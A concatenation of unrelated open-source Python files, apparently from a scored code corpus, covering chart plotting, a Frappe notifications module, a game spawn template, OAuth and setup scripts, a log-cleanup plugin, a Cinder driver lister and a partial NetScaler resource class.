["Strategy prevailance among all configurations"]) strat_chart.add('Absolute cooperation', statistics[1][0][5]) strat_chart.add('Absolute defection', statistics[2][0][5]) strat_chart.render_to_file(path+"strat_prev_with_"+file_name+".svg") # Guilt repartition : min max mean... 
knowing C and D guilt_rep_chart = pygal.Bar(fill=True, interpolate='cubic', style=LightStyle) guilt_rep_chart.title = 'Global repartition of guilt knowing strategies' guilt_rep_chart.x_labels = map(str, ["Cooperative ("+str(int(statistics[1][0][5]))+" agt)","Non-cooperative ("+str(int(statistics[2][0][5]))+" agt)","Both"]) guilt_rep_chart.add('Min', [statistics[1][1][0],statistics[2][1][0],min(statistics[1][1][0],statistics[2][1][0])]) guilt_rep_chart.add('Mean', [statistics[1][1][2],statistics[2][1][2], (statistics[1][1][2] + statistics[2][1][2]) / 2]) guilt_rep_chart.add('Max', [statistics[1][1][1],statistics[2][1][1],max(statistics[1][1][1],statistics[2][1][1])]) guilt_rep_chart.add('Std-dev', [statistics[1][1][4], statistics[2][1][4], (statistics[1][1][4] + statistics[2][1][4]) / 2]) guilt_rep_chart.render_to_file(path+"guilt_rep_with_"+file_name+".svg") # Iteration chart iter_chart = pygal.Bar(fill=True, interpolate='cubic', style=LightStyle) iter_chart.title = 'Global iterations' iter_chart.x_labels = map(str, ["Iterations"]) iter_chart.add('Min', [ min([statistics[1][2][0], statistics[2][2][0]]) ] ) iter_chart.add('Mean', [ (statistics[1][2][2] + statistics[2][2][2]) / 2 ] ) iter_chart.add('Max', [ max(statistics[1][2][1], statistics[2][2][1]) ] ) iter_chart.render_to_file(path+"iteration_chart_"+file_name+".svg") # For now in sequential exp results in Pure strategy we have the following elements : ## Value::T R P S C::NumberOfCooperators D::NbOfDefectors IdealRepartition::[key1,key2,...]:[val1,val2] ## GuiltRep::[key1,...]:[val1,...] SumPayOffs::Float MinPayOffs::Float MaxPayOffs::Float Iteration::NbOfIteration # We want to do some chart that could be interesting for observations. 
What could be interesting : # -> Dominant strategy (C or D) % of dominance among experiences # -> Global PayOffs of C strategy vs the other (max, min, mean and e-type) when they prevail # (-> Min, max, mean and e-type global (C+D) PayOffs) # -> GuiltRepartition : ## -> mean, max, min, e-type knowing C ## -> mean, max, min, e-type knowing D if __name__ == '__main__': if len(sys.argv) == 2: full_path_csv_file = sys.argv[1] do_your_job(full_path_csv_file) else: print("Wrong number of argument (1 arg is expected). It should be : something.csv file")
0.033986
## # VRS Execution # (C) www.vl-e.nl ### # Vlet version : @VLET_VERSION@ # Author : Piter T. de Boer # Info : # VLET vrs jython interface example. # To start execute this jython file, use: # $VLET_INSTALL/bin/jython.sh <jython.file> ## #import VLET Util classes from nl.uva.vlet.exec import LocalExec,LocalProcess # use VLET Global class: from nl.uva.vlet import Global #python imports import time ### ### Simple Local Execution using VL-e Toolkit: ### # Bash interface : print "--- bash example ---" # command line + arguments to execute: commands=["/bin/bash","-c","echo hello world!; echo this is standard error >&2"]; #result is an String Array {stdout,stderr,status} result=LocalExec.execute(commands) stdout=result[0]; # string stderr=result[1]; # string status=result[2]; # string print "--- result ---" print " Standard out = ", stdout; print " Standard err = ", stderr; print " Exit status = ", status; ### ### non script command "ls" from command line: ### print "--- ls example ---" # use vlet Global: home=Global.getUserHome(); # command line + arguments to execute: commands=["ls","-a",home] [stdout,stderr,status]=LocalExec.execute(commands) print "--- result ---" print " Standard out = ", stdout; print " Standard err = ", stderr; print " Exit status = ", status; ## ## Background process and monitoring example ## print "--- Background example ---" # command line + arguments to execute: commands=["/bin/bash","-c","for a in 1 2 3 4 5 6 7; do echo run-$a; sleep 1 ; done ; echo done"] #Start script in background and wait process=LocalExec.execute(commands,False) # do stuff print "Process isTerminated() I =",process.isTerminated() time.sleep(1) print "Process isTerminated() II =",process.isTerminated() # wait for termination process.waitFor() # get result + exit status print "Process isTerminated() III =",process.isTerminated() print "Process exit value =",process.getExitValue() print "--- Process standard out ---\n",process.getStdout() print "---" print "--- Process 
standard error ---\n",process.getStderr() print "---" print "End."
0.035847
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import time_diff_in_seconds, now, now_datetime, DATETIME_FORMAT from dateutil.relativedelta import relativedelta @frappe.whitelist() def get_notifications(): if frappe.flags.in_install: return config = get_notification_config() groups = config.get("for_doctype").keys() + config.get("for_module").keys() cache = frappe.cache() notification_count = {} for name in groups: count = cache.hget("notification_count:" + name, frappe.session.user) if count is not None: notification_count[name] = count return { "open_count_doctype": get_notifications_for_doctypes(config, notification_count), "open_count_module": get_notifications_for_modules(config, notification_count), "open_count_other": get_notifications_for_other(config, notification_count), "new_messages": get_new_messages() } def get_new_messages(): last_update = frappe.cache().hget("notifications_last_update", frappe.session.user) now_timestamp = now() frappe.cache().hset("notifications_last_update", frappe.session.user, now_timestamp) if not last_update: return [] if last_update and time_diff_in_seconds(now_timestamp, last_update) > 1800: # no update for 30 mins, consider only the last 30 mins last_update = (now_datetime() - relativedelta(seconds=1800)).strftime(DATETIME_FORMAT) return frappe.db.sql("""select sender_full_name, content from `tabCommunication` where communication_type in ('Chat', 'Notification') and reference_doctype='user' and reference_name = %s and creation > %s order by creation desc""", (frappe.session.user, last_update), as_dict=1) def get_notifications_for_modules(config, notification_count): """Notifications for modules""" return get_notifications_for("for_module", config, notification_count) def get_notifications_for_other(config, notification_count): """Notifications for other items""" return 
get_notifications_for("for_other", config, notification_count) def get_notifications_for(notification_type, config, notification_count): open_count = {} notification_map = config.get(notification_type) or {} for m in notification_map: try: if m in notification_count: open_count[m] = notification_count[m] else: open_count[m] = frappe.get_attr(notification_map[m])() frappe.cache().hset("notification_count:" + m, frappe.session.user, open_count[m]) except frappe.PermissionError: pass # frappe.msgprint("Permission Error in notifications for {0}".format(m)) return open_count def get_notifications_for_doctypes(config, notification_count): """Notifications for DocTypes""" can_read = frappe.get_user().get_can_read() open_count_doctype = {} for d in config.for_doctype: if d in can_read: condition = config.for_doctype[d] if d in notification_count: open_count_doctype[d] = notification_count[d] else: try: if isinstance(condition, dict): result = len(frappe.get_list(d, fields=["name"], filters=condition, limit_page_length = 21, as_list=True, ignore_ifnull=True)) else: result = frappe.get_attr(condition)() except frappe.PermissionError: pass # frappe.msgprint("Permission Error in notifications for {0}".format(d)) except Exception, e: # OperationalError: (1412, 'Table definition has changed, please retry transaction') if e.args[0]!=1412: raise else: open_count_doctype[d] = result frappe.cache().hset("notification_count:" + d, frappe.session.user, result) return open_count_doctype def clear_notifications(user="*"): if user=="*": frappe.cache().delete_keys("notification_count:") else: # delete count for user frappe.cache().hdel_keys("notification_count:", user) def delete_notification_count_for(doctype): frappe.cache().delete_key("notification_count:" + doctype) def clear_doctype_notifications(doc, method=None, *args, **kwargs): config = get_notification_config() doctype = doc.doctype if doctype in config.for_doctype: delete_notification_count_for(doctype) return if doctype in 
config.for_module_doctypes: delete_notification_count_for(config.for_module_doctypes[doctype]) def get_notification_info_for_boot(): out = get_notifications() config = get_notification_config() can_read = frappe.get_user().get_can_read() conditions = {} module_doctypes = {} doctype_info = dict(frappe.db.sql("""select name, module from tabDocType""")) for d in list(set(can_read + config.for_doctype.keys())): if d in config.for_doctype: conditions[d] = config.for_doctype[d] if d in doctype_info: module_doctypes.setdefault(doctype_info[d], []).append(d) out.update({ "conditions": conditions, "module_doctypes": module_doctypes, }) return out def get_notification_config(): def _get(): config = frappe._dict() for notification_config in frappe.get_hooks().notification_config: nc = frappe.get_attr(notification_config)() for key in ("for_doctype", "for_module", "for_module_doctypes", "for_other"): config.setdefault(key, {}) config[key].update(nc.get(key, {})) return config return frappe.cache().get_value("notification_config", _get) def get_filters_for(doctype): '''get open filters for doctype''' config = get_notification_config() return config.get('for_doctype').get(doctype, {}) @frappe.whitelist() def get_open_count(doctype, name): '''Get open count for given transactions and filters :param doctype: Reference DocType :param name: Reference Name :param transactions: List of transactions (json/dict) :param filters: optional filters (json/list)''' frappe.has_permission(doc=frappe.get_doc(doctype, name), throw=True) meta = frappe.get_meta(doctype) links = meta.get_dashboard_data() # compile all items in a list items = [] for group in links.transactions: items.extend(group.get('items')) out = [] for d in items: filters = get_filters_for(d) fieldname = links.get('non_standard_fieldnames', {}).get(d, links.fieldname) data = {'name': d} if filters: # get the fieldname for the current document # we only need open documents related to the current document filters[fieldname] = name 
total = len(frappe.get_all(d, fields='name', filters=filters, limit=6, distinct=True, ignore_ifnull=True)) data['open_count'] = total total = len(frappe.get_all(d, fields='name', filters={fieldname: name}, limit=10, distinct=True, ignore_ifnull=True)) data['count'] = total out.append(data) out = { 'count': out, } module = frappe.get_meta_module(doctype) if hasattr(module, 'get_timeline_data'): out['timeline_data'] = module.get_timeline_data(doctype, name) return out
0.026633
import sys from services.spawn import MobileTemplate from services.spawn import WeaponTemplate from resources.datatables import WeaponType from resources.datatables import Difficulty from resources.datatables import Options from java.util import Vector def addTemplate(core): mobileTemplate = MobileTemplate() mobileTemplate.setCreatureName('panshee_warrior') mobileTemplate.setLevel(71) mobileTemplate.setDifficulty(Difficulty.NORMAL) mobileTemplate.setMinSpawnDistance(3) mobileTemplate.setMaxSpawnDistance(5) mobileTemplate.setDeathblow(False) mobileTemplate.setScale(1) mobileTemplate.setSocialGroup('panshee tribe') mobileTemplate.setAssistRange(1) mobileTemplate.setOptionsBitmask(128) mobileTemplate.setStalker(True) templates = Vector() templates.add('object/mobile/shared_dressed_ewok_f_01.iff') templates.add('object/mobile/shared_dressed_ewok_f_02.iff') templates.add('object/mobile/shared_dressed_ewok_f_03.iff') templates.add('object/mobile/shared_dressed_ewok_f_04.iff') templates.add('object/mobile/shared_dressed_ewok_f_05.iff') templates.add('object/mobile/shared_dressed_ewok_f_06.iff') templates.add('object/mobile/shared_dressed_ewok_f_07.iff') templates.add('object/mobile/shared_dressed_ewok_f_08.iff') templates.add('object/mobile/shared_dressed_ewok_f_09.iff') templates.add('object/mobile/shared_dressed_ewok_f_10.iff') templates.add('object/mobile/shared_dressed_ewok_f_11.iff') templates.add('object/mobile/shared_dressed_ewok_f_12.iff') templates.add('object/mobile/shared_dressed_ewok_m_01.iff') templates.add('object/mobile/shared_dressed_ewok_m_02.iff') templates.add('object/mobile/shared_dressed_ewok_m_03.iff') templates.add('object/mobile/shared_dressed_ewok_m_04.iff') templates.add('object/mobile/shared_dressed_ewok_m_05.iff') templates.add('object/mobile/shared_dressed_ewok_m_06.iff') templates.add('object/mobile/shared_dressed_ewok_m_07.iff') templates.add('object/mobile/shared_dressed_ewok_m_08.iff') 
templates.add('object/mobile/shared_dressed_ewok_m_09.iff') templates.add('object/mobile/shared_dressed_ewok_m_10.iff') templates.add('object/mobile/shared_dressed_ewok_m_11.iff') templates.add('object/mobile/shared_dressed_ewok_m_12.iff') mobileTemplate.setTemplates(templates) weaponTemplates = Vector() weapontemplate = WeaponTemplate('object/weapon/melee/unarmed/shared_unarmed_default.iff', WeaponType.UNARMED, 1.0, 6, 'kinetic') weaponTemplates.add(weapontemplate) mobileTemplate.setWeaponTemplateVector(weaponTemplates) attacks = Vector() mobileTemplate.setDefaultAttack('meleeHit') mobileTemplate.setAttacks(attacks) lootPoolNames_1 = ['Junk'] lootPoolChances_1 = [100] lootGroupChance_1 = 65 mobileTemplate.addToLootGroups(lootPoolNames_1,lootPoolChances_1,lootGroupChance_1) lootPoolNames_2 = ['random_loot_primitives'] lootPoolChances_2 = [100] lootGroupChance_2 = 35 mobileTemplate.addToLootGroups(lootPoolNames_2,lootPoolChances_2,lootGroupChance_2) core.spawnService.addMobileTemplate('panshee_warrior', mobileTemplate) return
0.026156
#!/usr/bin/env python # # Copyright (c) 2016, The OpenThread Authors. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of the copyright holder nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # import unittest from autothreadharness.harness_case import HarnessCase class Leader_5_3_7(HarnessCase): role = HarnessCase.ROLE_LEADER case = '5 3 7' golden_devices_required = 5 def on_dialog(self, dialog, title): pass if __name__ == '__main__': unittest.main()
0
"""Memory profiler powered by memory_profiler.""" from __future__ import division from __future__ import absolute_import from __future__ import print_function from __future__ import unicode_literals import functools import memory_profiler import six from ..interfaces import profiler from . import base class BaseMemoryProfiler(base.SubprocessProfiler): """Base memory profiler using memory_profiler.""" @classmethod def aggregate(cls, results): """Return the last results.""" return results[-1] @property def baseline(self): """Get the memory usage of the process without running code.""" func = functools.partial( memory_profiler.memory_usage, (six.exec_, ('pass', globals(), locals()), {}), ) functools.update_wrapper(func, memory_profiler.memory_usage) results = self.delegate(func) return sum(results) / len(results) def profile(self, setup, code): """Execute the code using the timeit profiler.""" results = memory_profiler.memory_usage( (six.exec_, (setup + '\n' + code, globals(), locals()), {}), ) return profiler.ProfileResult( value=self.__class__.aggregate(results) - self.baseline, unit='megabytes', ) class MaxMemoryProfiler(BaseMemoryProfiler): """Memory profiler that returns the highest measured memory usage.""" aggreagate = max class MinMemoryProfiler(BaseMemoryProfiler): """Memory profiler that returns the lowest measured memory usage.""" aggreagate = min class AvgMemoryProfiler(BaseMemoryProfiler): """Memory profiler that returns the average measured memory usage.""" @classmethod def aggreagate(cls, results): """Get the average of the results.""" return sum(results) / len(results)
0
""" GitHub-Flask ------------ Adds support to authorize users with GitHub and make API requests with Flask. Links ````` * `documentation <http://github-flask.readthedocs.org>`_ * `development version <http://github.com/cenkalti/github-flask/zipball/master#egg=GitHub-Flask-dev>`_ """ import os import re from setuptools import setup def read(*fname): path = os.path.join(os.path.dirname(__file__), *fname) with open(path) as f: return f.read() def get_version(): for line in read('flask_github.py').splitlines(): m = re.match(r"__version__\s*=\s'(.*)'", line) if m: return m.groups()[0].strip() raise Exception('Cannot find version') setup( name='GitHub-Flask', version=get_version(), url='http://github.com/cenkalti/github-flask', license='MIT', author='Cenk Alti', author_email='cenkalti@gmail.com', description='GitHub extension for Flask microframework', long_description=__doc__, py_modules=['flask_github'], test_suite='test_flask_github', zip_safe=False, include_package_data=True, platforms='any', install_requires=[ 'Flask', 'requests', ], tests_require=['mock'], classifiers=[ 'Environment :: Web Environment', 'Intended Audience :: Developers', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Internet :: WWW/HTTP :: Dynamic Content', 'Topic :: Software Development :: Libraries :: Python Modules' ] )
0
# # Paasmaker - Platform as a Service # # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. # import os import glob import uuid import time import logging import paasmaker from base import BasePeriodic, BasePeriodicTest import colander class LogsCleanerConfigurationSchema(colander.MappingSchema): max_age = colander.SchemaNode(colander.Integer(), title="Maximum log age", description="Maximum age for a log file. After this age, it is deleted. In seconds. Default 7 days.", default=86400 * 7, missing=86400 * 7) class LogsCleaner(BasePeriodic): """ A plugin to remove log files once they reach a certain age. """ OPTIONS_SCHEMA = LogsCleanerConfigurationSchema() API_VERSION = "0.9.0" def on_interval(self, callback, error_callback): # Start by making a list of directories at the top level. self.paths = glob.glob(os.path.join(self.configuration.get_flat('log_directory'), '*')) # Process them one by one. self.callback = callback self.error_callback = error_callback self.removed_files = 0 self.older_than = int(time.time()) - self.options['max_age'] self.logger.info("Starting cleanup process.") self._fetch_directory() def _fetch_directory(self): try: this_dir = self.paths.pop() self._process_directory(this_dir) except IndexError, ex: # No more to process. self.logger.info("Completed cleanup process. Removed %d log files.", self.removed_files) self.callback("Removed %d log files." % self.removed_files) def _process_directory(self, path): self.directory_contents = glob.glob( os.path.join(path, '*.log') ) self._fetch_file() def _fetch_file(self): try: this_file = self.directory_contents.pop() information = os.stat(this_file) if information.st_mtime < self.older_than: # This file should be removed. # Check the file size. If it's over a 1MB # delete it using a subprocess and rm. Why? 
# Because unlink() will block, and on large # log files and certain filesystems, this # could hang up the process for a while. if information.st_size > 1024 * 1024: self.logger.info("Removing %s via subprocess", this_file) def on_rm_finished(code): # Move onto the next file. self.removed_files += 1 self.configuration.io_loop.add_callback(self._fetch_file) # TODO: This won't work on Windows. process = paasmaker.util.popen.Popen( ['rm', this_file], io_loop=self.configuration.io_loop, on_exit=on_rm_finished ) else: self.logger.info("Removing %s", this_file) os.unlink(this_file) self.removed_files += 1 # Process the next file on the IO loop. self.configuration.io_loop.add_callback(self._fetch_file) else: # Nope. Move on. self.configuration.io_loop.add_callback(self._fetch_file) except IndexError, ex: # No more to process. self.configuration.io_loop.add_callback(self._fetch_directory) def _handle_file(self, file): self.configuration.io_loop.add_callback(self._fetch_file) class LogsCleanerTest(BasePeriodicTest): def setUp(self): super(LogsCleanerTest, self).setUp() self.configuration.plugins.register( 'paasmaker.periodic.logs', 'paasmaker.common.periodic.logs.LogsCleaner', {}, 'Log Cleanup Plugin' ) self.logger = logging.getLogger('job') # Prevent propagation to the parent. This prevents extra messages # during unit tests. self.logger.propagate = False # Clean out all handlers. Otherwise multiple tests fail. self.logger.handlers = [] paasmaker.util.joblogging.JobLoggerAdapter.setup_joblogger(self.configuration) def test_simple(self): # Create a few sample log files. for i in range(10): job_id = str(uuid.uuid4()) job_logger = self.configuration.get_job_logger(job_id) job_logger.error("Test") job_logger.finished() # Make one big log file. 
job_id = str(uuid.uuid4()) job_logger = self.configuration.get_job_logger(job_id) test_string = "test" * 1024 for i in range(1024): job_logger.error(test_string) job_logger.finished() plugin = self.configuration.plugins.instantiate( 'paasmaker.periodic.logs', paasmaker.util.plugin.MODE.PERIODIC ) # This should remove nothing. plugin.on_interval(self.success_callback, self.failure_callback) self.wait() self.assertTrue(self.success) self.assertIn(" 0 ", self.message, "Wrong message returned.") # Adjust all the log files so that they are older than the threshold. expected_age = time.time() - (86400 * 8) for log_file in glob.glob(os.path.join(self.configuration.get_flat('log_directory'), '*', '*.log')): os.utime(log_file, (expected_age, expected_age)) # Now clean. plugin.on_interval(self.success_callback, self.failure_callback) self.wait() self.assertTrue(self.success) self.assertIn(" 11 ", self.message, "Wrong message returned.")
0.026216
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import webnotes, os, subprocess, tempfile, json, datetime @webnotes.whitelist() def get(): with open("../app/home/page/latest_updates/latest_updates.json", "r") as lufile: return json.loads(lufile.read()) def make(): def add_to_logs(out, repo): out.seek(0) last_commit = None for l in out.readlines(): l = l.decode('utf-8') if last_commit is not None: if l.startswith("Date:"): last_commit["date"] = l[8:-1] last_commit["datetime"] = datetime.datetime.strptime(last_commit["date"][:-6], "%a %b %d %H:%M:%S %Y") if l.startswith("Author:"): last_commit["author"] = l[8:-1] if l.startswith(" "): last_commit["message"] = l[4:-1] if l.startswith("commit"): last_commit = { "repo": repo, "commit": l.split(" ")[1][:-1] } logs.append(last_commit) os.chdir("lib") logs = [] out_lib = tempfile.TemporaryFile() subprocess.call("git --no-pager log -n 200 --no-color", shell=True, stdout=out_lib) add_to_logs(out_lib, "lib") os.chdir("../app") out_app = tempfile.TemporaryFile() subprocess.call("git --no-pager log -n 200 --no-color", shell=True, stdout=out_app) add_to_logs(out_app, "app") logs.sort(key=lambda a: a["datetime"], reverse=True) for a in logs: del a["datetime"] for i in xrange(len(logs)): if i and logs[i]["message"]==logs[i-1]["message"]: logs[i]["delete"] = True if logs[i]["message"].startswith("Merge branch") or "[" not in logs[i]["message"]: logs[i]["delete"] = True logs = filter(lambda a: a if not a.get("delete") else None, logs) os.chdir("..") with open("app/home/page/latest_updates/latest_updates.json", "w") as lufile: lufile.write(json.dumps(logs, indent=1, sort_keys=True)) if __name__=="__main__": make()
0.035677
from urllib import urlencode import six from requests_oauthlib import OAuth1 from .oauth import BaseOAuth2 class NKOAuth2(BaseOAuth2): """NK OAuth authentication backend""" name = 'nk' AUTHORIZATION_URL = 'https://nk.pl/oauth2/login' ACCESS_TOKEN_URL = 'https://nk.pl/oauth2/token' SCOPE_SEPARATOR = ',' ACCESS_TOKEN_METHOD = 'POST' SIGNATURE_TYPE_AUTH_HEADER = 'AUTH_HEADER' EXTRA_DATA = [ ('id', 'id'), ] def get_user_details(self, response): """Return user details from NK account""" entry = response['entry'] return { 'username': entry.get('displayName'), 'email': entry['emails'][0]['value'], 'first_name': entry.get('displayName').split(' ')[0], 'id': entry.get('id') } def auth_complete_params(self, state=None): client_id, client_secret = self.get_key_and_secret() return { 'grant_type': 'authorization_code', # request auth code 'code': self.data.get('code', ''), # server response code 'client_id': client_id, 'client_secret': client_secret, 'redirect_uri': self.get_redirect_uri(state), 'scope': self.get_scope_argument() } def get_user_id(self, details, response): """Return a unique ID for the current user, by default from server response.""" return details.get(self.ID_KEY) def user_data(self, access_token, *args, **kwargs): """Loads user data from service""" url = 'http://opensocial.nk-net.pl/v09/social/rest/people/@me?' 
+ \ urlencode({ 'nk_token': access_token, 'fields': 'name,surname,avatar,localization,age,' + 'gender,emails,birthdate' }) return self.get_json( url, auth=self.oauth_auth(access_token) ) def oauth_auth(self, token=None, oauth_verifier=None, signature_type=SIGNATURE_TYPE_AUTH_HEADER): key, secret = self.get_key_and_secret() oauth_verifier = oauth_verifier or self.data.get('oauth_verifier') token = token or {} # decoding='utf-8' produces errors with python-requests on Python3 # since the final URL will be of type bytes decoding = None if six.PY3 else 'utf-8' state = self.get_or_create_state() return OAuth1(key, secret, resource_owner_key=None, resource_owner_secret=None, callback_uri=self.get_redirect_uri(state), verifier=oauth_verifier, signature_type=signature_type, decoding=decoding)
0
#! /usr/bin/env python # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Generate list of Cinder drivers""" import argparse import os import json from cinder.interface import util from cinder import objects # Object loading can cause issues loading drivers, force it up front objects.register_all() parser = argparse.ArgumentParser(prog="generate_driver_list") parser.add_argument("--format", default='str', choices=['str', 'dict'], help="Output format type") # Keep backwards compatibilty with the gate-docs test # The tests pass ['docs'] on the cmdln, but it's never been used. 
parser.add_argument("output_list", default=None, nargs='?') CI_WIKI_ROOT = "https://wiki.openstack.org/wiki/ThirdPartySystems/" class Output(object): def __init__(self, base_dir, output_list): # At this point we don't care what was passed in, just a trigger # to write this out to the doc tree for now self.driver_file = None if output_list: self.driver_file = open( '%s/doc/source/drivers.rst' % base_dir, 'w+') self.driver_file.write('===================\n') self.driver_file.write('Available Drivers\n') self.driver_file.write('===================\n\n') def __enter__(self): return self def __exit__(self, type, value, traceback): if self.driver_file: self.driver_file.close() def write(self, text): if self.driver_file: self.driver_file.write('%s\n' % text) else: print(text) def format_description(desc, output): desc = desc or '<None>' lines = desc.rstrip('\n').split('\n') for line in lines: output.write(' %s' % line) def print_drivers(drivers, config_name, output): for driver in sorted(drivers, key=lambda x: x.class_fqn): driver_name = driver.class_name if not driver.supported: driver_name += " (unsupported)" output.write(driver_name) output.write('-' * len(driver_name)) if driver.version: output.write('* Version: %s' % driver.version) output.write('* %s=%s' % (config_name, driver.class_fqn)) if driver.ci_wiki_name and 'Cinder_Jenkins' not in driver.ci_wiki_name: output.write('* CI info: %s%s' % (CI_WIKI_ROOT, driver.ci_wiki_name)) output.write('* Description:') format_description(driver.desc, output) output.write('') output.write('') def output_str(cinder_root, args): with Output(cinder_root, args.output_list) as output: output.write('Volume Drivers') output.write('==============') print_drivers(util.get_volume_drivers(), 'volume_driver', output) output.write('Backup Drivers') output.write('==============') print_drivers(util.get_backup_drivers(), 'backup_driver', output) output.write('FC Zone Manager Drivers') output.write('=======================') 
print_drivers(util.get_fczm_drivers(), 'zone_driver', output) def collect_driver_info(driver): """Build the dictionary that describes this driver.""" info = {'name': driver.class_name, 'version': driver.version, 'fqn': driver.class_fqn, 'description': driver.desc, 'ci_wiki_name': driver.ci_wiki_name, 'supported': driver.supported} return info def output_dict(): """Output the results as a JSON dict.""" driver_list = [] drivers = util.get_volume_drivers() for driver in drivers: driver_list.append(collect_driver_info(driver)) print(json.dumps(driver_list)) def main(): tools_dir = os.path.dirname(os.path.abspath(__file__)) cinder_root = os.path.dirname(tools_dir) cur_dir = os.getcwd() os.chdir(cinder_root) args = parser.parse_args() try: if args.format == 'str': output_str(cinder_root, args) elif args.format == 'dict': output_dict() finally: os.chdir(cur_dir) if __name__ == '__main__': main()
0
# # Copyright (c) 2008-2015 Citrix Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License") # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response from nssrc.com.citrix.netscaler.nitro.service.options import options from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util class feoaction(base_resource) : """ Configuration for Front end optimization action resource. 
""" def __init__(self) : self._name = "" self._pageextendcache = False self._imgshrinktoattrib = False self._imggiftopng = False self._imginline = False self._cssimginline = False self._jpgoptimize = False self._imglazyload = False self._cssminify = False self._cssinline = False self._csscombine = False self._convertimporttolink = False self._jsminify = False self._jsinline = False self._htmlminify = False self._cssmovetohead = False self._jsmovetoend = False self._domainsharding = "" self._dnsshards = [] self._clientsidemeasurements = False self._imgadddimensions = False self._imgshrinkformobile = False self._imgweaken = False self._jpgprogressive = False self._cssflattenimports = False self._jscombine = False self._htmlrmdefaultattribs = False self._htmlrmattribquotes = False self._htmltrimurls = False self._hits = 0 self._undefhits = 0 self._builtin = [] self.___count = 0 @property def name(self) : """The name of the front end optimization action.<br/>Minimum length = 1. """ try : return self._name except Exception as e: raise e @name.setter def name(self, name) : """The name of the front end optimization action.<br/>Minimum length = 1 """ try : self._name = name except Exception as e: raise e @property def pageextendcache(self) : """Extend the time period during which the browser can use the cached resource. """ try : return self._pageextendcache except Exception as e: raise e @pageextendcache.setter def pageextendcache(self, pageextendcache) : """Extend the time period during which the browser can use the cached resource. """ try : self._pageextendcache = pageextendcache except Exception as e: raise e @property def imgshrinktoattrib(self) : """Shrink image dimensions as per the height and width attributes specified in the <img> tag. 
""" try : return self._imgshrinktoattrib except Exception as e: raise e @imgshrinktoattrib.setter def imgshrinktoattrib(self, imgshrinktoattrib) : """Shrink image dimensions as per the height and width attributes specified in the <img> tag. """ try : self._imgshrinktoattrib = imgshrinktoattrib except Exception as e: raise e @property def imggiftopng(self) : """Convert GIF image formats to PNG formats. """ try : return self._imggiftopng except Exception as e: raise e @imggiftopng.setter def imggiftopng(self, imggiftopng) : """Convert GIF image formats to PNG formats. """ try : self._imggiftopng = imggiftopng except Exception as e: raise e @property def imginline(self) : """Inline images whose size is less than 2KB. """ try : return self._imginline except Exception as e: raise e @imginline.setter def imginline(self, imginline) : """Inline images whose size is less than 2KB. """ try : self._imginline = imginline except Exception as e: raise e @property def cssimginline(self) : """Inline small images (less than 2KB) referred within CSS files as background-URLs. """ try : return self._cssimginline except Exception as e: raise e @cssimginline.setter def cssimginline(self, cssimginline) : """Inline small images (less than 2KB) referred within CSS files as background-URLs. """ try : self._cssimginline = cssimginline except Exception as e: raise e @property def jpgoptimize(self) : """Remove non-image data such as comments from JPEG images. """ try : return self._jpgoptimize except Exception as e: raise e @jpgoptimize.setter def jpgoptimize(self, jpgoptimize) : """Remove non-image data such as comments from JPEG images. """ try : self._jpgoptimize = jpgoptimize except Exception as e: raise e @property def imglazyload(self) : """Download images, only when the user scrolls the page to view them. 
